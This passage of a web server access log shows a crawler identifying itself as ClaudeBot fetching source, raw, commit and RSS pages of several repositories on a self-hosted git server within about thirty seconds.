Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/include/site/python3.12" -[15/Feb/2026:12:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/tsconfig.json" [Client 216.73.216.188] [Length 11851] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 216.73.216.188] [Length 987] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/calculator.py" [Client 216.73.216.188] [Length 13077] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/Dockerfile" [Client 216.73.216.188] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" [Client 216.73.216.188] [Length 943] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/README.md" [Client 216.73.216.188] [Length 11305] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3.12" [Client 216.73.216.188] [Length 11077] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 216.73.216.188] [Length 943] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/init_db.py?display=source" [Client 216.73.216.188] [Length 16179] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/database.py" [Client 216.73.216.188] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/Dockerfile" [Client 216.73.216.188] [Length 859] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/metadata.json" [Client 216.73.216.188] [Length 11261] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 216.73.216.188] [Length 4258] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs?display=source" [Client 216.73.216.188] [Length 11623] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components" [Client 216.73.216.188] [Length 10564] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app" [Client 216.73.216.188] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services" [Client 216.73.216.188] [Length 9905] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.assets.json?display=source" [Client 216.73.216.188] [Length 44917] [Gzip 12.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" [Client 216.73.216.188] [Length 74447] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache?display=source" [Client 216.73.216.188] [Length 12523] [Gzip 3.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2Fobj%2FDebug%2Fnet8.0%2FOpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 216.73.216.188] [Length 21774] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/database.py" [Client 216.73.216.188] [Length 753] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2Fobj%2FDebug%2Fnet8.0%2FOpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 216.73.216.188] [Length 21172] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv/include" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/index.html" [Client 216.73.216.188] [Length 6903] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/Dockerfile" [Client 216.73.216.188] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/update_status.py?display=source" [Client 216.73.216.188] [Length 12968] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/python3.12" [Client 216.73.216.188] [Length 9837] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets" [Client 216.73.216.188] [Length 10290] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/services/geminiService.ts?display=source" [Client 216.73.216.188] [Length 13387] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Fdatabase.sqlite" [Client 216.73.216.188] [Length 20956] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv/include" -[15/Feb/2026:12:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/package.json" [Client 216.73.216.188] [Length 11669] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/include/site/python3.12" [Client 216.73.216.188] [Length 9849] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache?display=rendered" [Client 216.73.216.188] [Length 11179] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj" [Client 216.73.216.188] [Length 9887] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html?display=source" [Client 216.73.216.188] [Length 30933] [Gzip 9.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/README.md?display=rendered" [Client 216.73.216.188] [Length 13351] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/start.sh?display=rendered" [Client 216.73.216.188] [Length 10974] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.tsx" [Client 216.73.216.188] [Length 11610] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/package.json?display=source" [Client 216.73.216.188] [Length 11686] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/python3.12" [Client 216.73.216.188] [Length 963] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/components/Header.tsx" [Client 216.73.216.188] [Length 9779] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10867] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/docker-compose.yml" [Client 216.73.216.188] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/3.conf" [Client 216.73.216.188] [Length 14075] [Gzip 4.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/status.json" [Client 216.73.216.188] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/requirements.txt?display=source" [Client 216.73.216.188] [Length 11374] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/components/Header.tsx" [Client 216.73.216.188] [Length 828] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/Dockerfile" [Client 216.73.216.188] [Length 264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/index.html?display=source" [Client 216.73.216.188] [Length 16459] [Gzip 5.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2Fobj%2FDebug%2Fnet8.0%2FOpcConnectionTest.AssemblyInfo.cs" [Client 216.73.216.188] [Length 22154] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/python3.12" [Client 216.73.216.188] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 15110] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/static/js/app.js" [Client 216.73.216.188] [Length 10079] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/status.json?display=source" [Client 216.73.216.188] [Length 11049] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/css/style.css" [Client 216.73.216.188] [Length 10147] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/docker-compose.yml?display=source" [Client 216.73.216.188] [Length 11861] [Gzip 3.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json?display=rendered" [Client 216.73.216.188] [Length 11209] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/assetpilot.ico" [Client 216.73.216.188] [Length 10834] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/2.conf" [Client 216.73.216.188] [Length 12987] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument" [Client 216.73.216.188] [Length 10303] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 216.73.216.188] [Length 9860] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/css/style.css" [Client 216.73.216.188] [Length 18163] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 216.73.216.188] [Length 14303] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/Dockerfile?display=source" [Client 216.73.216.188] [Length 11594] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/static/js/app.js" [Client 216.73.216.188] [Length 1424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3.12?display=source" [Client 216.73.216.188] [Length 11307] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html?display=rendered" [Client 216.73.216.188] [Length 14712] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates" [Client 216.73.216.188] [Length 10177] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" 